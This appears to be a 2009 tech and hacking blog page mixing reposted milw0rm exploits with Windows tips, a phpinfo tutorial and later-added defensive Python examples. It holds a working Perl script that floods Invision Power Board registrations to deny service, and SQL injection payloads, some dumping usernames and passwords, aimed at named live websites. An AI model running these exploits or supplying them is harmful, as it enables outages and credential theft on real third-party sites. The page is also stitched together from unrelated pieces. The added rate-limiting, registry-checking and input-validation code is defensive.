Saturday, March 14, 2009

Invision Power Board <= 2.1.4 (Register Users) Denial of Service Exploit

#!/usr/bin/perl
use IO::Socket;
##########################################################
## _______ _______ ______ #
## |______ |______ | \ #
## ______| |______ |_____/ #
## #
##IPB Register Multiple Users Denial of Service #
##Doesn't Work on forums using "Code Confirmation" #
##Created By SkOd #
##SED security Team #
##http://www.sed-team.be #
##skod.uk@gmail.com #
##ISRAEL #
##########################################################

print q{
############################################################
# Invision Power Board Multiple Users DOS #
# Tested on IPB 2.0.1 #
# created By SkOd. SED Security Team #
############################################################
};
$rand=rand(10);
print "Forum Host: ";
$serv = <STDIN>;
chop ($serv);
print "Forum Path: ";
$path = <STDIN>;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$name="sedXPL_".$rand.$i;
$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
$len = length $data;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
print $get1 "POST ".$path."index.php HTTP/1.0\n";
print $get1 "Host: ".$serv."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$len."\n\n";
print $get1 $data;
syswrite STDOUT, "+";
}
print "Forum shuld be Dosed. Check it out...\n";

# milw0rm.com [2006-02-10]
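
A forum that does not use code confirmation can still blunt the flood this script generates by capping registration submissions per client address. The sketch below is an added example, not code from the original post or from Invision Power Board; the class name, thresholds and sample traffic are assumptions, and only the act=Reg / CODE=02 field values come from the request shown above.

```python
from collections import defaultdict, deque
from urllib.parse import parse_qs


class RegistrationLimiter:
    """Sliding-window cap on registration submissions per client address."""

    def __init__(self, max_per_window=3, window_s=600):
        self.max_per_window = max_per_window
        self.window_s = window_s
        self._accepted = defaultdict(deque)  # client -> times of accepted submissions

    @staticmethod
    def is_registration(body):
        # The flood posts the registration form: act=Reg with CODE=02.
        fields = parse_qs(body, keep_blank_values=True)
        return fields.get("act") == ["Reg"] and fields.get("CODE") == ["02"]

    def allow(self, client, body, now):
        """Return True if the request may proceed, False if it must be rejected."""
        if not self.is_registration(body):
            return True  # other forum traffic is not limited here
        stamps = self._accepted[client]
        while stamps and now - stamps[0] >= self.window_s:
            stamps.popleft()  # forget submissions that left the window
        if len(stamps) >= self.max_per_window:
            return False
        stamps.append(now)
        return True


def replay(requests, limiter):
    """Run (time, client, body) tuples through the limiter; count accepted sign-ups."""
    accepted = defaultdict(int)
    for now, client, body in requests:
        if limiter.is_registration(body) and limiter.allow(client, body, now):
            accepted[client] += 1
    return dict(accepted)


# Constructed traffic: one client submits the form every second for 20 s,
# another registers once and then sends an unrelated request.
SAMPLE = [(t, "203.0.113.7", f"act=Reg&CODE=02&UserName=user{t}&agree=1") for t in range(20)]
SAMPLE += [(5, "198.51.100.4", "act=Reg&CODE=02&UserName=alice&agree=1"),
           (6, "198.51.100.4", "act=Login&CODE=01&UserName=alice")]

if __name__ == "__main__":
    print(replay(SAMPLE, RegistrationLimiter()))
```

Rejected attempts are not recorded, so the window is measured from the accepted submissions only.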

Fear Nothing. Risk Everything.

WWW.INDONESIANCODER.COM

Tuesday, March 10, 2009

CMS WEBjump! Multiple SQL Injection Vulnerabilities

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author : M3NW5
contact : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

--== Dork ==--
Powered by Content Management System WEBjump! "portfolio_genre.php?id="

Exploit : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

--== Dork ==--
Powered by Content Management System WEBjump! "news_id.php?lang="

Exploit : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-03-10]



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Monday, March 9, 2009

Prevent DNS problems with this tip for Windows XP

When you visit a website, Windows XP tries to speed things up by placing the DNS information about that site into a DNS cache on your PC.

This is OK until there are problems with the network, DNS server or even the website!

You see, the Windows XP DNS cache stores BOTH negative and positive entries. Positive entries are those where the DNS lookup was successful and you could connect to the website.

Negative entries are those where the DNS lookup failed and you could not connect to the website.

A problem can arise here because if the DNS cache holds a negative entry and the website you want to view is now OK to view, Windows XP will still give you a DNS error!

By default these negative entries are cached for 5 minutes. But we can tweak the registry to NOT store negative entries at all!

There is ALSO another potential pitfall with the Windows XP DNS cache...

Most ISPs and domain name registrars now update their DNS information (TTL) every 4 hours instead of the twice daily updates that were common a few years ago.

This means that your Windows XP DNS cache may be out of date for certain entries!

So let's look at how we can tweak the registry to prevent these problems occurring:

Flush DNS

First of all it would be a good idea to flush the local DNS cache so we are starting with a clean sheet!

To do this, simply enter ipconfig /flushdns at a command prompt. A window will then appear confirming the flush:

Successful DNS Flush

Now that we have a clean DNS cache, let's make the changes to the registry.


Block Negative Entries

To force Windows XP NOT to cache negative entries we need to add a new DWORD to the following Registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters


DWORD: MaxNegativeCacheTtl

Value: 0

This will now ensure NO negative entries are stored.


Cache TTL

To force Windows XP to keep positive entries in DNS Cache for only 4 hours instead of the default 24 hours we need to apply the following change to the registry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters


DWORD: MaxCacheTtl

Value: 14400

NB - make sure you enter the 14400 (seconds) as Decimal Base and NOT Hexadecimal Base!

Now your registry key should look similar to this

dnscache
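
To confirm that both values were entered in the right base, export the key to a .reg file and check it. The following is an added example, not part of the original tip; it parses the text of such an export, and the function names and both sample exports are constructed.

```python
import re

KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters"
WANTED = {"MaxNegativeCacheTtl": 0, "MaxCacheTtl": 14400}  # seconds, from the steps above
DWORD_LINE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def read_dwords(reg_text, key=KEY):
    """Return {lower-cased value name: int} for the DWORDs under key in a .reg export."""
    values, in_key = {}, False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_key = line.strip("[]").lower() == key.lower()
        elif in_key:
            match = DWORD_LINE.match(line)
            if match:
                # Exports always write DWORDs as eight hex digits.
                values[match.group(1).lower()] = int(match.group(2), 16)
    return values


def check(reg_text):
    """Return a list of problems; an empty list means both values match the steps."""
    found, problems = read_dwords(reg_text), []
    for name, want in WANTED.items():
        got = found.get(name.lower())
        if got is None:
            problems.append(f"{name}: missing")
        elif got != want:
            typed_as_hex = got == int(str(want), 16)
            hint = " (decimal digits were entered as hexadecimal)" if typed_as_hex else ""
            problems.append(f"{name}: {got} s, expected {want} s{hint}")
    return problems


# Constructed exports. GOOD follows the steps; BAD has 14400 typed with Hexadecimal selected.
HEADER = "Windows Registry Editor Version 5.00\n\n[" + KEY + "]\n"
GOOD = HEADER + '"MaxNegativeCacheTtl"=dword:00000000\n"MaxCacheTtl"=dword:00003840\n'
BAD = HEADER + '"MaxNegativeCacheTtl"=dword:00000000\n"MaxCacheTtl"=dword:00014400\n'

if __name__ == "__main__":
    print(check(GOOD))
    print(check(BAD))
```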






Saturday, March 7, 2009

"This operation has been cancelled due to restrictions in effect on this computer."

A very common question in the Microsoft public newsgroups goes something like this:

When clicking on a hyperlink in an e-mail, I get this message: "This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator." I get this message every time that I attempt to use the hyperlink. I am the administrator on this stand-alone computer. How do I deactivate this feature so that I activate hyperlinks?

This is not an Outlook error. The most common cause is a corrupt registry key in Internet Explorer 6. The registry key found at
HKEY_Local_Machine\Software\Classes\htmlfile\shell\open\command

is either damaged or corrupt.

To fix it, try resetting Web settings in Internet Explorer. If this does not resolve the issue, you'll need to import the registry key from another computer.

Reset Web Settings

To Reset Web settings

1. Open Internet Explorer.
2. On the Tools menu, click Internet Options.
3. Click the Programs tab, and then click the Reset Web Settings button.
4. Under Internet programs, verify that the correct e-mail program is selected.
5. Click to select the "Internet Explorer should check to see whether it is the default browser" check box.
6. Click Apply, and then click OK.

If you receive a message when Internet Explorer starts telling you that IE is not currently your default browser, click Yes to make it your default.

Import the Registry Key

When resetting the web settings doesn't help, you'll need to recreate the corrupt key. The easiest way to do this is by exporting the key from another computer.

To save exporting it from another computer, right click here to download a registry key exported from my computer. Choose Save target as and change the file extension from txt to reg and double click on it to run it.

If you prefer to use a key from a computer you have access to, follow the instructions in "You receive an error message when you click a hyperlink in Outlook".

Set Program Access in Control Panel

Windows XP and Vista allow you to control program defaults through Control Panel, Add and Remove Programs, Set Program Access and Defaults. If the above methods fail, use this method to set the default browser.

Other Causes

There are several other causes of this error. In most cases, they do not affect hyperlinks in Outlook. If you found this page searching for the error message, check out the following pages. Note that if you receive this error on a computer at work, you should contact your administrator; they may want access to applications restricted for security reasons.

You receive the message when:
# Using Outlook 2002 SP3
# Trying to run a program
# Saving a document (Windows 2000)
# Accessing file open dialog
# Starting Windows Explorer

Search Microsoft (using Google) for additional articles

More Information

You receive an error message when you click a hyperlink in Outlook



Thursday, March 5, 2009

Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability

Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen

Vendor : http://jogjacamp.com

bugs : /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

###############################################################

greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p

# milw0rm.com [2009-03-03]
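
Both this advisory and the WEBjump one above inject through a parameter that should only ever hold a row id (id, id_news). The following added example, which is not part of either advisory or of the affected products, shows the server-side fix: reject anything that is not a plain integer, then bind the id as a query parameter. The news table, the function names and the example.com URLs are constructed for illustration.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Parameters the two advisories inject into; each should carry only a row id.
ROW_ID_PARAMS = ("id", "id_news")


def parse_row_id(raw):
    """Return raw as an int if it is a plain ASCII decimal number, else None."""
    if raw.isascii() and raw.isdigit() and len(raw) <= 10:
        return int(raw)
    return None


def rejected_params(url):
    """List the (name, decoded value) pairs in url that are not valid row ids."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [(name, raw) for name in ROW_ID_PARAMS
            for raw in query.get(name, []) if parse_row_id(raw) is None]


def fetch_news_title(conn, raw_id):
    """Look up one row; the id is validated, then bound as a parameter."""
    row_id = parse_row_id(raw_id)
    if row_id is None:
        return None  # rejected before the database is touched
    row = conn.execute("SELECT title FROM news WHERE id = ?", (row_id,)).fetchone()
    return row[0] if row else None


def demo_db():
    """Constructed in-memory stand-in for the CMS database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO news VALUES (6, 'Site relaunch')")
    return conn


# Requests shaped like those in the advisories, with the host replaced by example.com.
SAMPLE_URLS = [
    "http://example.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--",
    "http://example.com/index.php?action=news.detail&id_news=6%20union%20select%20"
    "concat(username,0x3a,password),2,3%20from%20phpss_account%20--",
    "http://example.com/index.php?action=news.detail&id_news=6",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(rejected_params(url) or "ok")
```

The same rejected_params check can be run over web-server access logs to find requests that already tried this against a site.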



Wednesday, March 4, 2009

Make a PHP info file

This tutorial will show you how to display Apache PHP configuration.
It is useful in cases when you are going to install a particular application which needs specific requirements like register_globals or long_array turned On or Off.

This can be done by simply uploading one file, for example 'info.php' with the following code included inside:




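<?php

// Print all information.
phpinfo();

// Output only the module information.
phpinfo(INFO_MODULES);

// Delete this file once you have checked the settings: the output exposes server configuration details.

?>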


Create a text file with your favorite text editor, such as Notepad, then copy and paste the code above into it. Save the file as, for example, info.php and then upload it to your server.
Then browse to http://yourdomain.tld/info.php and you should see a table with the current PHP configuration and module information.





Tuesday, March 3, 2009

SSH Explorer SSH Client



SSH Explorer is a new generation SSH/Telnet client and terminal emulator that makes remote Linux server administration look like much more fun than it actually is.
File View panel lets you navigate through and operate with remote directories and files as effortlessly as if they were on your home computer.

The integrated text editor will be a great tool for people who don't like the awkward vi and emacs interface.

SSH Explorer also includes a pack of useful Linux commands and allows you to create your own snippets so you don't have to remember and type them anymore. VT100 terminal emulation, SSH1, SSH2 and Telnet protocols are supported.

PCWIN[dot]COM
